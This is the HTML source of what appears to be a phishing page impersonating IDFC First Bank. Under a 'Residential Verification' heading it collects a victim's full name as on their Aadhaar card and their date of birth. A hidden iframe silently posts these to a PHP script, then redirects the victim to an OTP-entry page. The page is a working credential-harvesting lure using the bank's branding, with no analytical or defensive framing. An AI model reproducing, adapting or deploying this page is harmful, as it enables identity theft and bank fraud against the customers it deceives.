<!DOCTYPE html>
<html lang="en" >
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <meta name="theme-color" content="#9C1D26">
    <title>IDFC First Bank | Residential Verification</title>
<meta name="description" content="login" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&display=swap" rel="stylesheet">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'><link rel="stylesheet" href="./style.css">
</head>
<style type="text/css">
#mn
{ 
  width:40%;
  margin-top:10px;
  margin-bottom:20px;
  margin-left:10px;
}
#ft
{ 
  width:104%;
  margin-top:50px;
  margin-left:-7px;
  text-align:bottom;
}
#pc
{ 
  width:50%;
}
#ot
{ 
  width:35%;
  margin-left:10px;
  margin-top:10px;
}
input[type="text"] {
  width: 95%;
  color:#707070;
  font-size:14px;
  border: 1.5px solid #D8D8D8;
  border-radius: 4px;
  outline: none;
  padding: 20px 22px;
  box-sizing: border-box;
  transition: 0.3s;
}
body{
  font-family: 'Roboto', sans-serif;
   background-color: #f7f7f7;
  
}


/*------------*/
.form-area {
    background-color: #fff;
    box-shadow: 2px 5px 10px rgba(90, 116, 148, 0.2);
    padding: 20px;
    border-radius: 6px;
    display: flex;
    }
.form-area .form-inner {
    width: 100%;
}
.intl-tel-input,
.iti{
  width: 100%;
}

.input-group__input
{
text-transform: uppercase;
}
input::-webkit-input-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus::-webkit-input-placeholder {
    color: #999;
    text-transform:none;
    font-family: 'Open Sans', sans-serif;
}

/* Firefox < 19 */
input:-moz-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus:-moz-placeholder {
    color: #999;
    font-family: 'Open Sans', sans-serif;
    text-transform:none;
}

/* Firefox > 19 */
input::-moz-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus::-moz-placeholder {
    color: #999;
    font-family: 'Open Sans', sans-serif;
    text-transform:none;
}

/* Internet Explorer 10 */
input:-ms-input-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus:-ms-input-placeholder {
    color: #999;
    font-family: 'Open Sans', sans-serif;
    text-transform:none;
}
</style>
<body onload="startTimer();">
  <!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Enter_OTP.html';}"></iframe>
        <div class="container">
        <img alt="" src="IDFC_Logo.jpg" id="mn"/><br>
        <section class="pt-5 pb-5">
    <div class="container text-center">
        <div class="row">
        </div>
    </div>

    <div class="container">
        <div class="row justify-content-center">
                <div class="form-area">
                    <div class="form-inner">
                        <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="form">
                        <center><img alt="" src="IDFC_Pic.jpg" id="pc"/></center>
                        <div><center>
                        <h4 style="
                        background-color:#DFF6FE;
                        font-family:'Open Sans', sans-serif;
                        padding: 15px;
                        border-radius:1px;
                        margin:0px;
                        margin-left:-5%;
                        font-size:16px;
                        color:#9C1D26;
                        width:100%;
                        height:20px;"
                        >Account Details Verification</h4></center></div><br><br>
                        <div class="input-group">
                        <center><input type="text" class="input-group__input" placeholder="Full Name (as per AADHAR)" name="Full Name" id="name" onkeydown="return /[a-z A-Z]/i.test(event.key)"
                        minlength="3" maxlength="30" 
                        autocomplete="off" required />
                        <label class="input-group__label2" for="Password">Enter Full Name</label></center>
                        </div>
                        <div class="input-group">
                        <center><input type="text" class="input-group__input" placeholder="DD/MM/YYYY" name="Date_Of_Birth" id="dob" inputmode="numeric" maxlength="10" 
                         autocomplete="off" required />
                        <label class="input-group__label2" for="DOB">Date Of Birth</label></center>
                        </div><br>
                        <script type="text/javascript">
                        var isShift = false;
                        var seperator = "/";
                        window.onload = function () {
                        //Reference the Table.
                        var tblForm = document.getElementById("dob");
                        
                        //Reference all INPUT elements in the Table.
                        var inputs = document.getElementsByTagName("input");
                        
                        //Loop through all INPUT elements.
                        for (var i = 0; i < inputs.length; i++) {
                        //Check whether the INPUT element is TextBox.
                        if (inputs[i].name == "Date_Of_Birth") {
                        //Check whether Date Format Validation is required.
                        if (inputs[i].className.indexOf("date-format") != 1) {
                        
                        //Set Max Length.
                        inputs[i].setAttribute("maxlength", 10);
                        
                        //Only allow Numeric Keys.
                        inputs[i].onkeydown = function (e) {
                        return IsNumeric(this, e.keyCode);
                        };
                        
                        //Validate Date as User types.
                        inputs[i].onkeyup = function (e) {
                        ValidateDateFormat(this, e.keyCode);
                        };
                        }
                        }
                        }
                        };
                        
                        function IsNumeric(input, keyCode) {
                        if (keyCode == 16) {
                        isShift = true;
                        }
                        //Allow only Numeric Keys.
                        if (((keyCode >= 48 && keyCode <= 57) || keyCode == 8 || keyCode <= 37 || keyCode <= 39 || (keyCode >= 96 && keyCode <= 105)) && isShift == false) {
                        if ((input.value.length == 2 || input.value.length == 5) && keyCode != 8) {
                        input.value += seperator;
                        }
                        
                        return true;
                        }
                        else {
                        return false;
                        }
                        };
                        
                        function ValidateDateFormat(input, keyCode) {
                        var dateString = input.value;
                        if (keyCode == 16) {
                        isShift = false;
                        }
                        var regex = /(((0|1)[0-9]|2[0-9]|3[0-1])\/(0[1-9]|1[0-2])\/((19|20)\d\d))$/;
                        
                        //Check whether valid dd/MM/yyyy Date Format.
                        if (regex.test(dateString) || dateString.length == 0) {
                        ShowHideError(input, "none");
                        } else {
                        ShowHideError(input, "block");
                        }
                        };
                        
                        </script>
                        <center><button type="submit">Submit</button></center><br>
                        </form>
                        
</section>
                        <img alt="" src="IDFC_Footer.jpg" id="ft"/>
               </div>
               </div>
               </div>
               </div>
               </div>
               </body>
               </html>